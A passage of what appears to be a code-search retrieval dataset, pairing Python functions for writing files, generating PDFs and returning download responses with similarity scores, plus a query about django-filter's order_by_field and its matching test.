\"attachment\")\n self.request.response.setHeader(\"filename\", nice_filename)\n self.request.response.setHeader('Last-Modified',\n DateTime.rfc822(DateTime()))\n self.request.response.setHeader(\"Cache-Control\", \"no-store\")\n self.request.response.setHeader(\"Pragma\", \"no-cache\")\n return open(filename, 'rb').read()", "def write(self, fileobj: Union[Path, StrByteType]) -> None:\n if self.output is None:\n raise RuntimeError(ERR_CLOSED_WRITER)\n\n # Add pages to the PdfWriter\n # The commented out line below was replaced with the two lines below it\n # to allow PdfMerger to work with PyPdf 1.13\n for page in self.pages:\n self.output.add_page(page.pagedata)\n pages_obj = cast(Dict[str, Any], self.output._pages.get_object())\n page.out_pagedata = self.output.get_reference(\n pages_obj[PA.KIDS][-1].get_object()\n )\n\n # Once all pages are added, create outline items to point at those pages\n self._write_dests()\n self._write_outline()\n\n # Write the output to the file\n my_file, ret_fileobj = self.output.write(fileobj)\n\n if my_file:\n ret_fileobj.close()", "def render_to_response(self, context, **response_kwargs):\n\n response = HttpResponse(mimetype=self.mimetype)\n response['Content-Disposition'] = ('attachment; filename=%s.%s' %\n (context['filename'],\n self.extension))\n f = render_to_pdf(self.template_name, context)\n response.write(f)\n return response", "def write_pdf_file(output_filename, pdf_writer):\n with open(output_filename, 'wb') as output_file:\n pdf_writer.write(output_file)\n\n # Extra measures to make sure data is written to disk\n output_file.flush()\n os.fsync(output_file.fileno())", "def write_tmp_pdf(self, attachment_file):\n if not attachment_file:\n return None\n outfile, outfilename = tempfile.mkstemp(suffix=\".pdf\")\n outfile = open(outfilename, 'wb')\n outfile.write(str(attachment_file.data))\n outfile.close()\n return outfilename", "def write(cls, file, data):\n file.write(data)", "def generate_pdf_file(self, source):\n filename = self.generate_temp_filename()\n if not filename:\n self.errors.append('filename_generation_failed')\n return\n\n try:\n transform_module = getattr(transforms, self.pdf_generator)\n except AttributeError:\n self.errors.append('wrong_generator_configuration')\n return\n\n self.filename = filename\n url = self.context.absolute_url()\n\n print_css = (self.pdf_tool.always_print_css or\n self.context.portal_type in self.pdf_tool.print_css_types)\n\n # When the source is sent through Ajax, it's already encoded\n # as a utf-8 string. When using it without javascript, the\n # source comes from a view, which always returns unicode. In\n # that case we need to encode it.\n if isinstance(source, unicode):\n source = source.encode('utf-8')\n export_file, err = transform_module.html_to_pdf(\n source,\n self.tempdir,\n filename,\n url,\n print_css,\n self.get_extra_options())\n\n if err:\n self.errors.append('pdf_creation_failed')\n return\n\n self.pdf_tool.registerPDF(filename)\n self.pdf_file = export_file\n self.pdf_file.close()", "def _produce_pdf_as_a_response(self, html):\n # Create a Django response object, and specify content_type as pdf\n response = HttpResponse(content_type='application/pdf')\n # Define that this is an attachment. \n response['Content-Disposition'] = 'attachment;'\n pisaStatus = pisa.CreatePDF(html, dest=response)\n \n return response", "def post_drawing_pdf(self, request):\n HttpRequest = request.to_http_info(self.api_client.configuration)\n return self.__make_request(HttpRequest, 'POST', 'file')", "def write_to_file(file: Text, data: bytes):\n with open(file, \"wb\") as w:\n w.write(data)\n w.flush()", "def write_pdf_content(pdf_content, target_dir):\n txt_file = open(target_dir,'w', encoding = 'utf-8')\n txt_file.write(pdf_content)\n txt_file.close()", "def save(self, filepath: Union[str, pathlib.Path]) -> None:\n if isinstance(filepath, str):\n filepath = pathlib.Path(filepath)\n with filepath.open(mode='wb') as file:\n file.write(self.response.content)", "def _save_file(self, file_path, data):\n self._ensure_directory(os.path.dirname(file_path))\n with open(file_path, \"wb\") as f:\n f.write(data)", "def post_drawing_pdf_async(self, request):\n HttpRequest = request.to_http_info(self.api_client.configuration)\n return self.__make_request_async(HttpRequest, 'POST', 'file')", "def get(self, request, document_id, **kwargs):\n document = get_object_or_404(Document, id=document_id)\n with open(document.file.path, 'rb') as f:\n response = HttpResponse(f.read(), content_type='application/pdf')\n response['Content-Disposition'] = 'attachment; filename=\"%s\"' % document.file.name\n return response", "def write(self, file):\n\n rtf = self.getRtf()\n if isinstance(file, str):\n with open(file, \"w\", newline=\"\\n\") as fp:\n fp.write(rtf)\n else:\n file.write(rtf)", "def saveOnFile(self, path, data):\n with open(path, \"w\") as f:\n f.write(data)", "def write(self, object, content_type, to_file):\n return to_file", "def save_text_to_file(self, pdf):\r\n Path(f'{self.text_folder}/{self.pdf_category}').mkdir(parents=True,\r\n exist_ok=True)\r\n with open(self.destination, 'w') as f:\r\n f.write(pdf)", "def write(self, filename, data):\n raise NotImplementedError", "def create_pdf(request):\n\n contact_info = ContactDetails.objects.iterator()\n\n # Create a file-like buffer to receive PDF data.\n buffer = io.BytesIO()\n\n # Create the PDF object, using the buffer as its \"file.\"\n pdf_file = canvas.Canvas(buffer)\n\n # Draw things on the PDF. Here's where the PDF generation happens\n pdf_file.setTitle(\"Contact Infomation\")\n pdf_file.setFont(\"Helvetica-Bold\", 20, leading=None)\n pdf_file.setFillColorRGB(1,0,0)\n pdf_file.drawString( 60, 800, \"Stefanos Taramas Contact Information\")\n pdf_file.setFillColorRGB(0,0,0)\n pdf_file.setFont(\"Helvetica\", 15, leading=None)\n\n for index, item in enumerate(contact_info):\n line = str(index + 1) +\") \" + str(item.contact_name) + \": \" + str(item.contact_info)\n column = 50\n row = 750 - 15*index\n pdf_file.drawString(column, row, line)\n\n # Close the PDF object cleanly\n pdf_file.showPage()\n pdf_file.save()\n\n # FileResponse sets the Content-Disposition header so that browsers\n # present the option to save the file.\n buffer.seek(0)\n\n return FileResponse(buffer, as_attachment=True, filename='StefanosTaramasContactInfo.pdf')", "def write_file(self, path, data):\n _url = f\"{self.connector.base_url}/projects/{self.project_id}/files/{path}\"\n\n self.connector.http_call(\"post\", _url, data=data)", "def _create_pdf(self, survey, response):\n pdf_transformer = PDFTransformer(survey, response)\n self._pdf, self._page_count = pdf_transformer.render_pages()\n return self._pdf", "def return_pdf(\n file_name: str,\n settings: config.Settings = Depends(get_settings),\n db: Session = Depends(get_db),\n token: str = Depends(oauth2_scheme),\n):\n logged_user = get_current_user(db, token)\n\n if not logged_user:\n raise HTTPException(403)\n\n if not (logged_user.is_staff or logged_user.is_superuser):\n results = read_results(db, cpf=logged_user.cpf, PDF_Filename=file_name)\n if not results:\n raise HTTPException(404)\n\n result_path = Path(settings.pdf_storage_path).joinpath(file_name)\n\n return FileResponse(str(result_path.absolute()), media_type=\"application/pdf\")", "def toFile(self, file_path) -> None:\n\t\tjson_repr = self.toJSON()\n\t\t\n\t\twith open(file_path, \"w\") as f:\n\t\t\tf.write(json_repr)", "def generate_pdf(file_path_or_url, data_type, filename):\n file_path = get_pdf_file_path(filename)\n if data_type == TYPE_FILE:\n try:\n HTML(filename=file_path_or_url).write_pdf(file_path)\n finally:\n default_storage.delete(file_path_or_url)\n else:\n HTML(file_path_or_url).write_pdf(file_path)\n return filename", "def render_pdf(self, target=None, zoom=1):\n return self._document.write_pdf(target=target, zoom=zoom)", "def vantechy(request):\n return FileResponse(open('/files/presentation.pdf', 'rb'))", "def write(self, data):\n return self._write(self.wfile, data)", "def generate_pdf_flask_response(pdf_data):\n html = HTML(string=pdf_data)\n\n return render_pdf(html)", "def saveFile(self, data, filelocation):\n with open(filelocation, 'w+') as f:\n f.write(data)", "def write_file(self):\n file = open(self.__file_path, 'w+')\n file.truncate(0)\n file.write(self.__content)\n file.close()", "def get_pdf(self) -> io.BytesIO:\n return self._get_pdf(rendered_html=self.get_rendered_html())", "def generate_pdf(pdf_data):\n\n html = HTML(string=pdf_data)\n f = html.write_pdf()\n\n return f", "def write(self, data_to_write):\n self.single_file.write(data_to_write)\n self.single_file.flush()", "def write(self, filename=None):\n # Take filename and expand tilde.\n if filename is not None:\n self.filename = filename\n assert self.filename\n filename = os.path.expanduser(self.filename)\n\n # Write it.\n with codecs.open(filename, 'w', self.encoding) as f:\n f.write(self.buffer.text)\n\n self._file_content = self.buffer.text", "def process_output_file_write(output_file, response):\n\n with open(output_file, \"w\") as output_file:\n output_file.write(response)", "def filewrite(self, filename, data):\n try:\n filedata = data.decode(\"utf-8\")\n except Exception:\n filedata = data\n lock = FileLock(filename)\n lock.acquire()\n with open(filename, 'w+') as f:\n f.write(filedata)\n lock.release()", "def save_tmp_file(self, data):\n with open(self.tmp_file, 'wb') as f:\n f.write(data)", "def write_data(tech_id, tech_name, sentence, source, date_crawled):\n with open('PDF_data.txt', 'a') as f:\n # text = match[\"tid\"] + '\\n' + match[\"name\"] + '\\n' + sent + '\\n' + source + '\\n' + date_crawled + '\\n\\n'\n text = tech_id + '\\n' + tech_name + '\\n' + sentence + '\\n' + source + '\\n' + date_crawled + '\\n\\n'\n f.write(text)", "def write_to_file(self, filename: str) -> None:", "def save_response_to_file(self, response, format=None, annotation=''):\n \n if format is None:\n logging.error(\"Specify a format\")\n return None\n\n # Build filename, choosing extension carefully\n url = response.url\n _name, _ext = os.path.splitext(url.split('/')[-1])\n name = remove_reserved_chars(_name)\n if format in ['html', 'pdf']:\n # HTML files might originally have no extension;\n # PDF files may have a non-PDF extension but PDFMiner requires them to have a .pdf extension\n ext = f'.{format}'\n if _ext != '':\n logging.warning(f\"Overwriting file extension from url ({_ext}) with expected extension ({ext}) for {url}\")\n else:\n if _ext == '':\n # Look up extension from dictionary. Note that Google Sheets are assumed to be exported as CSV files.\n ext = todf.get_ext(format)\n logging.warning(\"No extension in original url for {format} data: using expected extension {ext}\")\n else:\n ext = _ext.split('?')[0] # Remove query portion of URL, if any \n file_name = f\"{self.state_abbrev}{annotation}{name}{ext}\"\n\n # Save HTML and CSV as text, other formats as binary\n file_path = os.path.join(TMPDIR, file_name)\n if ext == '.html' or ext == '.csv':\n try:\n with open(file_path, 'w') as f:\n f.write(response.text)\n except UnicodeEncodeError:\n with open(file_path, \"w\", encoding=\"utf-8\") as f:\n f.write(response.text)\n except AttributeError as e:\n logging.error(f\"{e}. Check if the format of the content at this URL is html as expected; if not, update the code to specify the correct format (e.g., pdf).\")\n else:\n with open(file_path, 'wb') as f:\n f.write(response.body) \n\n return file_path", "def save(self, file):\n self._save(file.encode())", "def write_to_file(self, file, content):\n with open(file, 'a') as report_file:\n report_file.write('{}\\n'.format(content))", "def download(filename):\n path = os.path.join(\n current_app.root_path, current_app.config['UPLOAD_FOLDER'], filename)\n path_default = current_app.config[\"PDF_TEMPLATE_PATH\"]\n\n def generate():\n try:\n with open(path, \"rb\") as f:\n yield from f\n os.remove(path)\n except FileNotFoundError:\n with open(path_default, \"rb\") as f:\n yield from f\n\n r = current_app.response_class(generate(), mimetype='application/pdf')\n r.headers.set(\n 'Content-Disposition', 'attachment', filename=PDF_OUT_FILENAME\n )\n return r", "def write(self, file):\n #write header\n self.ID.write(file)\n if (self.write_size): \n self.size.write(file)\n for variable in self.variables:\n variable.write(file)\n for subchunk in self.subchunks:\n subchunk.write(file)", "def to_pdf(self, wkhtmltopdf: str, f, output_file: Optional[str] = None):\n if output_file is None:\n output_file = \"-\"\n html = self(f)\n with tempfile.NamedTemporaryFile(\"wb\", suffix=\".html\") as fd:\n html.write(fd)\n fd.flush()\n res = subprocess.run([wkhtmltopdf, fd.name, output_file], stdin=subprocess.DEVNULL, capture_output=True)\n if res.returncode != 0:\n raise RuntimeError(\"%s exited with error %d: stderr: %s\", self.wkhtmltopdf, res.returncode, res.stderr)\n if output_file == \"-\":\n return res.stdout", "def write(self, file_path, content):\n self._set_extension(file_path)\n\n logger.debug(\"writing to %s\", self._file_path)\n\n self._content = content\n\n if self._file_ext == 'json':\n self._write_json()", "def write_to_file(self, papers, filename):\n\t\tpass", "def save_file(self, filename):\r\n \r\n f = open(filename,'w')\r\n f.write(self.body)\r\n f.close", "def save_response(response, file_name, path='~/tmp/fcb-analyzer'):\n \n path = ensure_path(path)\n f = open(path + '/' + file_name, 'w')\n f.write(response.text)", "def write(self, fp, options=None, text=None):\n output = self.render(options, text)\n self.writer.write(output, fp)", "def save(self, file: io.BufferedWriter):\n if self.downloaded:\n json.dump(self.data, file, indent=2)", "def to_output_file(self, content):\n self.__log(f'Starting to write response content to output file.')\n if self.output_file_exists() and not self.config['FORCE_OVERWRITE']:\n self.__log(f'Cannot write to file. Selected output file exists and FORCE_OVERWRITE is disabled.', 'error')\n raise FileExistsError\n file = self.config['OUT_FOLDER'] + '/' + self.config['OUTPUT_FOLDER'] + '/' + self.output_filename + '.' \\\n + self.options['image_format'].lower()\n with open(file, 'w') as f:\n f.writelines(content)\n self.__log(f'Successfully wrote response content to \"{file}\".', 'success')", "async def write(self, data, filename):\n logger.debug(\"JSON Page %s\", filename)\n fullpath = os.path.join(self.dirname, filename)\n basedir = os.path.dirname(fullpath)\n if not os.path.exists(basedir):\n os.makedirs(basedir)\n\n with open(fullpath, \"w\") as file_handle:\n file_handle.write(data)", "def write(self, stream):\r\n\r\n stream.write(pystache.render(self._template, self.template_data))", "def to_file(self, slug, folderpath=None, header=None, footer=None):\n if folderpath is None:\n if self.report_path is None:\n self.err(\n \"Please set the report_path parameter or pass a path in arguments\")\n return\n folderpath = self.report_path\n else:\n self.report_path = folderpath\n html = self._get_header(header)\n if html is None or html == \"\":\n self.err(self.to_file, \"Can not get html header\")\n for report in self.reports:\n if \"html\" not in report:\n self.err(\"No html for report \" + report)\n self.reports = self.report_engines = []\n return\n html += report[\"html\"]\n html += self._get_footer(footer)\n try:\n path = self._write_file(slug, folderpath, html)\n path = \"file://\" + path\n except Exception as e:\n self.err(e, self.to_file, \"Can not save report to file\")\n return\n self.reports = []\n self.report_engines = []\n if self.notebook is True:\n link = '<a href=\"' + path + '\" target=\"_blank\">' + path + '</a>'\n return display(HTML(link))", "def __call__(self, method):\n\n that = self\n \n @functools.wraps(method)\n def wrapper(self, *args, **kwargs):\n html = method(self, *args, **kwargs)\n\n out = cStringIO.StringIO()\n pdf = weasyprint.HTML(string = html).write_pdf(target = out)\n\n response = self.app.response_class()\n response.content_type = \"application/pdf\"\n #response.content_disposition = \"attachment; filename=\\\"...\\\"\"\n response.data = out.getvalue()\n return response\n \n return wrapper", "def _write(self, filename, data):\n fullpath = os.path.join(self._tempdir, filename)\n with open(fullpath, 'w') as ofile:\n json.dump(data, ofile)\n return fullpath", "def save(self, filename):\n result = self.render()\n\n with open(filename, 'w') as f:\n f.write(result)", "def savePDFFile(self):\n s = self.text.get(\"1.0\", tk.END)\n f = open(file, \"w\", encoding='utf-8')\n f.write(s)\n f.close()\n\n # Create a file for each student with their graded files\n pdf = FPDF()\n pdf.add_page()\n pdf.set_font(\"Arial\", size=12)\n pdf.multi_cell(0, 5, s)\n\n # Removed the \\t from the filepath in order to save as pdf in 'Graded' file\n savingFilePDF = re.sub('\\t', '', item_text[0] + \".pdf\")\n pdf.output(gradedFilesFolder + \"\\\\\" + savingFilePDF)\n highlightingTextInFile()", "def write_to(self, fp):\n fp.write(self.text)", "def writeExportFile(self, fileExtension, fileData):\r\n\r\n targetDate = \"%s%s%s\" %(self.reportDate['year'],\r\n self.reportDate['mon'],\r\n self.reportDate['day'])\r\n exportFname = \"%s_%s.%s\" %(self.exportBaseFname, targetDate,\r\n fileExtension)\r\n linkName = \"%s.%s\" %(self.exportBaseFname, fileExtension)\r\n\r\n exportPath = os.path.join(self.exportDir, exportFname)\r\n linkPath = os.path.join(self.exportDir, linkName)\r\n\r\n f = file(exportPath, 'w+')\r\n f.write(fileData)\r\n f.close()\r\n\r\n os.chown(exportPath, 30156, 101)\r\n os.chmod(exportPath, 0664) \r\n\r\n os.remove(linkPath)\r\n os.symlink(exportPath, linkPath)", "def write(self, filename, data, hdr):\n pass", "def write_file(self, path, data):\n _url = (\n f\"{self.connector.base_url}/projects/{self.project_id}/nodes/{self.node_id}\"\n f\"/files/{path}\"\n )\n\n self.connector.http_call(\"post\", _url, data=data)", "def write(self, filename):\n pass", "def write(self, filename):\n pass", "def pdf_to_text(file_object):\n pdfData = file_object.read()\n tf = tempfile.NamedTemporaryFile()\n tf.write(pdfData)\n tf.seek(0)\n outputTf = tempfile.NamedTemporaryFile()\n\n if len(pdfData) > 0:\n out, err = subprocess.Popen([\"pdftotext\", \"-layout\", tf.name, outputTf.name ]).communicate()\n return outputTf.read()\n else:\n return None", "def write(self, file: IO) -> None:\n serializer = self.serializer_class(self.get_queryset(), many=True)\n\n writer = csv.DictWriter(file, self.serializer_class.Meta.fields)\n writer.writeheader()\n\n # Write serializer data and replace None/'' with 'NA'\n writer.writerows(\n OrderedDict(\n (\n field_name,\n \"NA\" if (field_value is None or field_value == \"\") else field_value,\n )\n for field_name, field_value in row.items()\n )\n for row in serializer.data\n )\n\n file.seek(0)", "def _pdf(self):\n # LOG: processing_type property\n self.set_property('processing_type', 'pdf')\n xmlDoc = PDFiD(self.src_path)\n oPDFiD = cPDFiD(xmlDoc, True)\n # TODO: are there other characteristics which should be dangerous?\n if oPDFiD.encrypt.count > 0:\n self.make_dangerous('encrypted pdf')\n if oPDFiD.js.count > 0 or oPDFiD.javascript.count > 0:\n self.make_dangerous('pdf with javascript')\n if oPDFiD.aa.count > 0 or oPDFiD.openaction.count > 0:\n self.make_dangerous('openaction')\n if oPDFiD.richmedia.count > 0:\n self.make_dangerous('flash')\n if oPDFiD.launch.count > 0:\n self.make_dangerous('launch')", "def save_file(path, file_data):\n file_data.save(path)", "def put_drawing_pdf(self, request):\n HttpRequest = request.to_http_info(self.api_client.configuration)\n return self.__make_request(HttpRequest, 'PUT', 'file')", "def __call__(self, method):\n\n that = self\n \n @functools.wraps(method)\n def wrapper(self, *args, **kwargs):\n html = method(self, *args, **kwargs)\n pdf = pisa.CreatePDF(html)\n\n response = self.app.response_class()\n response.content_type = \"application/pdf\"\n #response.content_disposition = \"attachment; filename=\\\"...\\\"\"\n response.data = pdf.dest.getvalue()\n return response\n \n return wrapper", "def filewrite(self, filename):\n io.write(self, filename)", "def export_to_file(self, fp, *args, **kwargs):\n with open(fp, 'w') as fh:\n self._to_str(fh)", "def attach_pdf(self, pdf_filename):\n attachment = open(pdf_filename, 'rb')\n part = MIMEApplication(attachment.read(), 'pdf')\n encoders.encode_base64(part)\n # See https://en.wikipedia.org/wiki/MIME#Content-Disposition\n _, filename = os.path.split(pdf_filename)\n part.add_header('Content-Disposition', 'attachment', filename=filename)\n self.attach(part)", "def convert_file_to_pdf(fileobj, outfilename=None,\n cmd_args=settings.WKHTML_DEFAULT_ARGS):\n log.debug(\"fileobj=%s\" % fileobj)\n log.debug(\"wkhtml args=%s\" % cmd_args)\n log.debug(\"outfile=%s\" % outfilename)\n if not outfilename:\n outfile, outfilename = tempfile.mkstemp(suffix='.pdf')\n log.debug(\"temp_pdf_file=%s\" % outfilename)\n os.close(outfile)\n else:\n outdirname = os.path.dirname(outfilename)\n log.debug(\"out_dir=%s\" % outdirname)\n if not os.path.exists(outdirname):\n os.makedirs(outdirname)\n tempfileobj, tempfilename = tempfile.mkstemp(suffix='.html')\n log.debug(\"temp_html_file=%s\" % tempfilename)\n tempfileobj = os.fdopen(tempfileobj, 'wb')\n log.debug(\"copying temp html\")\n shutil.copyfileobj(fileobj, tempfileobj)\n tempfileobj.close()\n cmd_args = cmd_args or []\n cmdline = [settings.WKHTML_PATH] + cmd_args + [tempfilename, outfilename]\n process = subprocess.Popen(cmdline,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n log.debug(\"running %s (%s)\" % (' '.join(cmdline),process))\n stdout, stderr = process.communicate()\n os.remove(tempfilename)\n if process.returncode > 0:\n raise ConvertError(stderr)\n return outfilename", "def render(path: str, params: dict):\n template = get_template(path)\n html = template.render(params)\n response = BytesIO()\n # is this file name a placeholder?\n #file = open('my.file.pdf', 'wb')\n pdf = pisa.pisaDocument(BytesIO(html.encode(\"UTF-8\")), response)\n #file.close()\n if not pdf.err:\n return HttpResponse(response.getvalue(), content_type='application/pdf')\n else:\n return HttpResponse(\"Error Rendering PDF\", status=400)", "def put_drawing_pdf_async(self, request):\n HttpRequest = request.to_http_info(self.api_client.configuration)\n return self.__make_request_async(HttpRequest, 'PUT', 'file')", "def stamp(self):\n if not self.__pdf_path:\n raise Exception('The PDF to be timestamped was not set')\n\n if not self.__overwrite_original_file and not self.__output_file_path:\n raise Exception(\"The output destination was not set\")\n\n args = [self.__pdf_path]\n\n # Add timestamp authority.\n if self._timestamp_authority:\n self._timestamp_authority\\\n .add_cmd_arguments(args, self._version_manager)\n\n # This option can only be used on versions greater then 1.5 of the\n # PKI Express.\n self._version_manager.require_version('1.5')\n\n # Logic to overwrite original file or use the output file.\n if self.__overwrite_original_file:\n args.append('--overwrite')\n else:\n args.append(self.__output_file_path)\n\n # This operation can only be used on versions greater than 1.7 of the\n # PKI Express.\n self._version_manager.require_version('1.7')\n\n # Invoke command.\n self._invoke(self.COMMAND_STAMP_PDF, args)", "def save_to_txt(self):\n content = self.get_corpus()\n txt_pdf = open('text_pdf.txt', 'wb')\n txt_pdf.write(content.encode('utf-8'))\n txt_pdf.close()", "def write_object_file_to_file(self, file_name):\n with open(file_name, 'wb+') as file:\n file.write(self.object_file.to_binary_array())", "def _save(self, data: PIL.Image) -> None:\n with self._fs.open(self._filepath, mode=\"wb\") as f:\n data.save(f)", "def pdfReceiver(request, model=''):\n\n\tinput_str = ''\n\tinput_str += parsePOST(request)\n\t# packet = io.StringIO() # write to memory\n\tpacket = io.BytesIO()\n\n\ttry:\n\t\tpisa.CreatePDF(input_str, dest=packet)\n\texcept ValueError as error:\n\t\t# triggered from the elusive invalid color value issue:\n\t\tlogging.warning(\"elusive invalid color value, defaulting html background-color to FFFFFF\")\n\t\tpisa.CreatePDF(input_str, dest=packet, default_css=\"body{background-color:#FFFFFF;}\")\n\n\n\tjid = MetabolizerCalc().gen_jid() # create timestamp\n\tresponse = HttpResponse(packet.getvalue(), content_type='application/pdf')\n\tresponse['Content-Disposition'] = 'attachment; filename=' + model + '_' + jid + '.pdf'\n\tpacket.close() # todo: figure out why this doesn't solve the 'caching problem'\n\treturn response", "def printPdfPersonalData(self, fileName, fileType, outFile):\n self.filesList.doBackup(fileName)\n self.filesList.cleanPdataMarks(fileName)\n\n if fileType != 'Pdf':\n outFile = AddedFile.changeExt(outFile, \"pdf\")\n #try:\n \n printer = QtGui.QPrinter() \n printer.setPageSize(QtGui.QPrinter.Letter)\n printer.setResolution(96)\n print \"Page size \", str(self.filesList.getPdataDocSize(fileName).height())\n printer.setPaperSize(QtCore.QSizeF(self.filesList.getPdataDocSize(fileName)), QtGui.QPrinter.Point)\n printer.setOutputFormat(QtGui.QPrinter.PdfFormat)\n printer.setOutputFileName(outFile)\n printer.setFullPage(True)\n self.personalDataList.document().print_(printer)\n self.writeDetails(\"Writing PDF to \" + outFile)\n self.filesList.loadBackup(fileName)\n\n #Finally clean the new pdf\n self.cleanPrintedPdf(outFile);\n\n # self.filesList.refreshPdata(fileName)\n #except Exception:\n # self.writeDetails(\"Failed to write to \" + fileName)", "def file_as_pdf(self, file_as_pdf):\n if file_as_pdf is not None and len(file_as_pdf) < 1:\n raise ValueError(\"Invalid value for `file_as_pdf`, length must be greater than or equal to `1`\") # noqa: E501\n\n self._file_as_pdf = file_as_pdf", "def report_download(self, data, token):\n requestcontent = json.loads(data)\n url, type = requestcontent[0], requestcontent[1]\n # raise UserError(type)\n if type in [\"qweb-docx\"]:\n # raise UserError(type)\n converter = \"docx\" # if type == 'qweb-pdf' else 'text'\n extension = \"docx\" # if type == 'qweb-pdf' else 'txt'\n pattern = (\n \"/report/docx/\" # if type == 'qweb-pdf' else '/report/text/'\n )\n reportname = url.split(pattern)[1].split(\"?\")[0]\n\n docids = None\n if \"/\" in reportname:\n reportname, docids = reportname.split(\"/\")\n\n if docids:\n # Generic report:\n response = self.report_routes(\n reportname, docids=docids, converter=converter\n )\n else:\n # Particular report:\n data_my = url_decode(\n url.split(\"?\")[1]\n ).items() # decoding the args represented in JSON\n response = self.report_routes(\n reportname, converter=converter, **dict(data_my)\n )\n\n report = request.env[\"ir.actions.report\"]._get_report_from_name(\n reportname\n )\n filename = \"%s.%s\" % (report.name, extension)\n\n if docids:\n ids = [int(x) for x in docids.split(\",\")]\n obj = request.env[report.model].browse(ids)\n if report.print_report_name and not len(obj) > 1:\n report_name = safe_eval(\n report.print_report_name, {\"object\": obj, \"time\": time}\n )\n filename = \"%s.%s\" % (report_name, extension)\n response.headers.add(\n \"Content-Disposition\", content_disposition(filename)\n )\n response.set_cookie(\"fileToken\", token)\n return response\n res = super().report_download(data, token)\n return res", "def save(self, file):\n pkgng_pkg = pptx.packaging.Package().marshal(self)\n pkgng_pkg.save(file)", "def save_data_to_file(file_data, file_path):\r\n# Open file and write in it the updated file_name(with actual_result).\r\n\twith open(file_path, 'a') as fp:\r\n\t\tfp.write('{}\\n'.format(json.dumps(file_data)))", "def pipe_to_file(response, path):\n # TODO: Indicate progress.\n with open(path, 'wb') as file:\n while True:\n chunk = response.read(4096)\n if not chunk:\n break\n file.write(chunk)", "def write_file(data, file_path):\n try:\n with open(file_path, \"w\") as file_obj:\n file_obj.write(data)\n\n except OSError:\n writer(f\"\\nwarning: Unable to write backup file {file_path}\\n\", FORMAT[\"WARNING\"])", "def pdf(self, identifier):\n return self.client.request_with_method(Methods.PDF % (self.name, identifier,))", "def output_attachment(self, path, content):\n\t\twith open(path, \"w+b\") as fd:\n\t\t\tfd.write(content)", "def write(self, filename, data):\n\t\t# create the path if it doesn't exists\n\t\tdir = os.path.dirname(filename)\n\t\tif not os.path.isdir(dir):\n\t\t\tos.mkdir(dir)\n\t\t\n\t\t# write data\n\t\tfile = codecs.open(filename, 'w', 'utf8')\n\t\tfile.write(data)\n\t\tfile.close()", "def _write(self, data):\n self._writer.write(data)", "async def write_file(self, directory: str, name: str, file: bytes):\n pass", "def render_file(self, context, result):\n\t\tif __debug__:\n\t\t\tlog.debug(\"Processing file-like object.\", extra=dict(request=id(context), result=repr(result)))\n\t\t\n\t\tresponse = context.response\n\t\tresponse.conditional_response = True\n\t\t\n\t\tmodified = mktime(gmtime(getmtime(result.name)))\n\t\t\n\t\tresponse.last_modified = datetime.fromtimestamp(modified)\n\t\tct, ce = guess_type(result.name)\n\t\tif not ct: ct = 'application/octet-stream'\n\t\tresponse.content_type, response.content_encoding = ct, ce\n\t\tresponse.etag = unicode(modified)\n\t\t\n\t\tresult.seek(0, 2) # Seek to the end of the file.\n\t\tresponse.content_length = result.tell()\n\t\t\n\t\tresult.seek(0) # Seek back to the start of the file.\n\t\tresponse.body_file = result\n\t\t\n\t\treturn True", "def render_to_file(properties,file):\n properties['tempfile']=None\n properties['remove_temp']=True\n properties['outfile']=file" ]
[ "0.67716074", "0.6708492", "0.6434953", "0.6190672", "0.61892325", "0.6181426", "0.6171567", "0.6031542", "0.5953594", "0.59264964", "0.587159", "0.5858788", "0.57871544", "0.5752377", "0.57122386", "0.56981695", "0.56687397", "0.5661542", "0.56381875", "0.56225604", "0.560822", "0.5581942", "0.55786645", "0.55767", "0.5574734", "0.55237013", "0.5498826", "0.5497146", "0.54862434", "0.5478343", "0.5470521", "0.54305845", "0.53972214", "0.53968906", "0.5395459", "0.5385356", "0.53772044", "0.53753006", "0.53752387", "0.5373756", "0.53583276", "0.53258884", "0.531551", "0.53120977", "0.5291906", "0.52756333", "0.52616304", "0.52578557", "0.5255777", "0.52452916", "0.52452826", "0.524169", "0.5236103", "0.5233252", "0.5222731", "0.5220387", "0.5219188", "0.52165395", "0.5206184", "0.51960033", "0.51911336", "0.5189426", "0.5188401", "0.51842916", "0.5171774", "0.5168048", "0.51671344", "0.51607364", "0.51607364", "0.5151243", "0.51419747", "0.5138908", "0.5124769", "0.5119853", "0.5119807", "0.5119603", "0.5116243", "0.5111749", "0.51068753", "0.5106738", "0.5085634", "0.5085299", "0.5081319", "0.5073705", "0.5073043", "0.5061898", "0.50490636", "0.5041407", "0.5040885", "0.50303406", "0.50273156", "0.5027141", "0.501512", "0.50138295", "0.5007945", "0.5006212", "0.49989682", "0.49977255", "0.49968487", "0.49960783" ]
0.55854136
21
Set the `order_by_field` on the filterset and ensure that the field name is respected.
def test_ordering_with_overridden_field_name(self): class F(FilterSet): class Meta: model = User fields = ['username', 'status'] order_by = ['status'] order_by_field = 'order' f = F({'order': 'status'}, queryset=self.qs) self.assertQuerysetEqual( f.qs, ['carl', 'alex', 'jacob', 'aaron'], lambda o: o.username)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_ordering_with_overridden_field_name(self):\n class F(FilterSet):\n class Meta:\n model = User\n fields = ['username', 'status']\n order_by = ['status']\n order_by_field = 'order'\n\n f = F().form\n self.assertNotIn('o', f.fields)\n self.assertIn('order', f.fields)\n self.assertEqual(f.fields['order'].choices, [('status', 'Status')])", "def test_ordering_with_overridden_field_name_and_descending(self):\n class F(FilterSet):\n class Meta:\n model = User\n fields = ['username', 'status']\n order_by = ['status', '-status']\n order_by_field = 'order'\n\n f = F().form\n self.assertNotIn('o', f.fields)\n self.assertIn('order', f.fields)\n self.assertEqual(f.fields['order'].choices, [('status', 'Status'), ('-status', 'Status (descending)')])", "def order_by(self, order_by):\n\n self._order_by = order_by", "def set_sort_by(self, sort_by):\n\n\t\tif sort_by is not None and not isinstance(sort_by, str):\n\t\t\traise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: sort_by EXPECTED TYPE: str', None, None)\n\t\t\n\t\tself.__sort_by = sort_by\n\t\tself.__key_modified['sort_by'] = 1", "def user_order_by(self, field):\n # Get ordering model.\n model_label = order.utils.resolve_labels('.'.join(\\\n [self.model._meta.app_label, self.model._meta.object_name]))\n orderitem_set = getattr(self.model, \\\n order.utils.resolve_order_item_related_set_name(model_label))\n order_model = orderitem_set.related.model\n\n # Resolve ordering model table name.\n db_table = order_model._meta.db_table\n\n # Add ordering field as extra queryset fields.\n pk_name = self.model._meta.pk.attname\n\n # If we have a descending query remove '-' from field name when quering.\n 